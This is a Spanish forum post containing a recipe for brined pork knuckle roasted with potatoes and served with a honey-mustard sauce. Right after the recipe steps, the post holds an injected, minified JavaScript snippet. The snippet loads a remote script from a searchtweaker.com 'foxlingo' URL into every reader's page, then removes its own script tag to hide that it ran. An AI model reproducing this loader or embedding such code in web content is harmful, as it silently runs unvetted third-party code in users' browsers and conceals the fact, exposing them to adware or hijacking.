Ajenos
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Codillo en salmuera con miel y mostaza

Ir abajo

chef Codillo en salmuera con miel y mostaza

Mensaje por Lilith Miér 18 Sep 2013, 10:16

[Tienes que estar registrado y conectado para ver esa imagen]

Ingredientes principales
1,750 kg de codillo cocido½ kg de patatas de guarnición30 g de miel50 g de mostazaGranos de mostazaRomeroAceite de olivaSal
Preparación de la receta 


Para preparar la receta de Codillo en salmuera con miel y mostaza

Sazonar y asar el codillo al horno junto con las patatas, el romero y un poco de aceite durante 45 minutos a 200º C.

Calentar la miel con un poco de agua, la mostaza y los granos de mostaza.

Servir el codillo, las patatas y rociar con la salsa de miel y mostaza.
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Lilith
Ajen@


Volver arriba Ir abajo

Volver arriba


 
Permisos de este foro:
No puedes responder a temas en este foro.